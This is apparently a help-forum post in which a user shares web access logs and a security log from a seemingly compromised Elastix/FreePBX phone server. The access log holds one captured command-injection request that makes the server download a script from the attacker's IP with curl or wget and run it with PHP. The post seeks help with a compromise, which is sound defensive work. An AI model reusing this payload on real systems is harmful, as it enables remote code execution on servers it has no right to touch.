51.15.12.13 - - [10/Jun/2017:04:56:17 -0400] "POST /vtigercrm/main.php?act=cmd HTTP/1.1" 404 216
51.15.12.13 - - [10/Jun/2017:04:56:17 -0400] "POST /config.all.php HTTP/1.1" 404 212
51.15.12.13 - - [10/Jun/2017:04:56:17 -0400] "POST /recordings/config.all.php HTTP/1.1" 403 227
51.15.12.13 - - [10/Jun/2017:04:56:18 -0400] "POST /panel/config.all.php HTTP/1.1" 404 218
51.15.12.13 - - [10/Jun/2017:04:56:18 -0400] "POST /vtigercrm/config.all.php HTTP/1.1" 404 222
51.15.12.13 - - [10/Jun/2017:04:56:19 -0400] "POST /admin/config.all.php HTTP/1.1" 404 218
51.15.12.13 - - [10/Jun/2017:04:56:19 -0400] "POST /0x4148.php.call HTTP/1.1" 404 213
51.15.12.13 - - [10/Jun/2017:04:56:20 -0400] "POST /recordings/misc/?cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 218
51.15.12.13 - - [10/Jun/2017:04:56:20 -0400] "POST /graph.php?module=upload HTTP/1.1" 404 207
51.15.12.13 - - [10/Jun/2017:04:56:21 -0400] "POST /recordings/graph.php?module=upload HTTP/1.1" 403 222
51.15.12.13 - - [10/Jun/2017:04:56:21 -0400] "POST /vtigercrm/graph.php?module=upload HTTP/1.1" 404 217
51.15.12.13 - - [10/Jun/2017:04:56:22 -0400] "POST /vtigercrm/phpversions.php?module=upload HTTP/1.1" 404 223
51.15.12.13 - - [10/Jun/2017:04:56:22 -0400] "POST /recordings/phpversions.php?module=upload HTTP/1.1" 403 228
51.15.12.13 - - [10/Jun/2017:04:56:23 -0400] "POST /phpversions.php?module=upload HTTP/1.1" 404 213
216.218.206.66 - - [10/Jun/2017:06:00:25 -0400] "GET / HTTP/1.1" 200 5409
216.218.206.66 - - [10/Jun/2017:06:01:06 -0400] "GET / HTTP/1.1" 200 5409
183.129.160.229 - - [10/Jun/2017:06:21:05 -0400] "GET / HTTP/1.1" 200 5409
163.172.69.33 - - [10/Jun/2017:09:28:26 -0400] "GET / HTTP/1.0" 400 362
163.172.69.33 - - [10/Jun/2017:09:28:28 -0400] "GET /recordings//theme/main.css HTTP/1.1" 200 184
163.172.69.33 - - [10/Jun/2017:09:30:18 -0400] "POST /recordings/index.php HTTP/1.1" 500 -
163.172.69.33 - - [10/Jun/2017:09:30:20 -0400] "GET /recordings/misc/audio.php HTTP/1.1" 200 -
98.242.248.14 - - [10/Jun/2017:09:45:25 -0400] "GET / HTTP/1.1" 500 -
navaismo I did a recursive search for that file and it is only found on /tmp and /var/www/html/_asterisk
I delete them over and over but they come back...
I see strange POST commands on the access and ssl_access logs which I have already shared with you..
navaismo This is my /var/log/secure log for June 9th:
Jun 9 00:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 00:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 00:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 00:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 00:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 00:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 00:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 00:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 00:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 00:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 00:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 00:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 01:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 01:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 01:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 01:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 01:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 01:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 01:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 01:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 01:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 01:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 01:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 01:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 02:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 02:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 02:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 02:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 02:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 02:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 02:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 02:35:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 02:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 02:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 02:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 02:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 03:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 03:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 03:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 03:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 03:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 03:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 03:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 03:35:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 03:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 03:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 03:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 03:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 04:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 04:02:01 voicesrv01 runuser: pam_unix(runuser-l:session): session opened for user cyrus by (uid=0)
Jun 9 04:02:01 voicesrv01 runuser: pam_unix(runuser-l:session): session closed for user cyrus
Jun 9 04:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 04:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 04:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 04:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 04:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 04:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 04:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 04:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 04:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 04:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 04:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 05:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 05:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 05:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 05:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 05:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 05:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 05:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 05:35:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 05:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 05:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 05:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 05:55:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 06:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 06:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 06:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 06:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 06:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 06:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 06:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 06:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 06:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 06:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 06:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 06:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 07:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 07:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 07:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 07:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 07:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 07:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 07:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 07:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 07:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 07:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 07:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 07:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 08:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 08:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 08:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 08:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 08:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 08:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 08:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 08:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 08:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 08:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 08:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 08:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 09:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 09:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 09:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 09:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 09:17:51 voicesrv01 sshd[15163]: Accepted password for root from 98.242.248.14 port 58874 ssh2
Jun 9 09:17:51 voicesrv01 sshd[15163]: pam_unix(sshd:session): session opened for user root by (uid=0)
Jun 9 09:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 09:20:02 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPASTERISKWEBGROUP asterisk
Jun 9 09:20:02 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPASTERISKWEBUSER asterisk
Jun 9 09:20:02 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPASTERISKGROUP asterisk
Jun 9 09:20:03 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPASTERISKUSER asterisk
Jun 9 09:20:03 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPDEVGROUP asterisk
Jun 9 09:20:03 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPDEVUSER asterisk
Jun 9 09:20:03 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting ASTMANAGERHOST localhost
Jun 9 09:20:05 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/retrieve_conf --run-install --skip-registry-checks
Jun 9 09:23:59 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 09:23:59 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 09:24:00 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table httpd
Jun 9 09:24:00 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table asterisk
Jun 9 09:24:00 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table sshd
Jun 9 09:24:00 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table vsftpd
Jun 9 09:24:00 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --dumpiptables
Jun 9 09:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 09:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 09:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 09:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 09:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 09:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 09:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 10:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 10:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 10:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 10:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 10:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 10:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 10:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 10:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 10:40:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 10:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 10:50:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 10:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 11:00:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 11:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 11:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 11:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 11:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 11:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 11:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 11:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 11:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 11:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 11:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 11:55:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 12:00:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 12:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 12:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
